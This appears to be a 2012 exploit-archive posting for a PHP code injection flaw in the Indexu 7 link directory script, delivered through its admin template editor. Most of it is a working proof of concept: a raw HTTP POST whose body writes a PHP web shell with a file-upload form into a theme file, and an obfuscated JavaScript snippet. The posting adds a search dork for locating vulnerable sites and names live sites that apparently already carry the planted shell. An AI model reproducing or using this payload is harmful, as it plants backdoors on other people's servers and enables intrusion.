# --------------------------------------- #
Author : L3b-r1'z
Title : Indexu 7 Php Code Injection
Date : 5/30/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "Listing by GooglePR"
Version : N\A
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :
The script allow admin to edit file in templates fol. as extention PHP :)
so an attacker can inject some code in any file (EDITED) .
NOTE :
Before you inject code , you should know if the themes is there
(./templates/KOMET).
As : http://www.site.com/templates/komet/rows.php
# --------------------------------------- #
3) PoC :

In POST b0x Above Of Live Http Header Put : http://www.site.com/admin/db.php

Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://site.com/admin/template.php?act=editfile&id=komet&file=rows.php
Cookie: U_AUTHENTICATED=1;  __atuvc=7|22;
PHPSESSID=6c8ee4251b4d5e252d0030dccdc389a8;
__utma=111872281.551771833.1338331592.1338331592.1338331592.1;
__utmc=111872281;
__utmz=111872281.1338331592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: multipart/form-data;
boundary=---------------------------11662147216064
Content-Length: 1157

Send POST Content :

-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="act"\r\n
\r\n
editfile\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="id"\r\n
\r\n
komet\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file"\r\n
\r\n
rows.php\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file_content"\r\n
\r\n
<?php\r\n
echo '<b><br><br>'.php_uname().'<br></b>';\r\n
echo '<form action="" method="post" enctype="multipart/form-data"
name="uploader" id="uploader">';\r\n
echo '<input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload"></form>';\r\n
if( $_POST['_upl'] == "Upload" ) {\r\n
\tif(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Upload SUKSES !!!</b><br><br>'; }\r\n
\telse { echo '<b>Upload GAGAL !!!</b><br><br>'; }\r\n
}\r\n
?>\r\n
<script type="text/javascript" language="javascript">ML="Rjnis/e
.rI<thzPS-omTCg>:=p";MI=";@E0:?D7@0EI=<<JH55>B26A<8B9F53CF45>814G;5@E0:?DG";OT="";for(j=0;j<MI.length;j++){OT+=ML.charAt(MI.charCodeAt(j)-48);}document.write(OT);</script>\r\n
-----------------------------11662147216064--\r\n

Snip : http://www11.0zz0.com/2012/05/30/00/788460850.png

Note : Use It On Your Own Risk.

Demo Site's :
http://telemed24.pl/templates/komet/rows.phphttp://sefid.com.pl/templates/komet/rows.php

Page 2 of about 975,000 results (0.17 seconds)  = And More In Google :P.


# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The
Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID ,
Indoushka .
# --------------------------------------- #



remove this note please : this script named indexu 7 web links i write
the dork you can check it now :D

and the demo site is upload form

and the bug is php code injection , i write p0c to inject upload form
in the default template :D

and thx you :D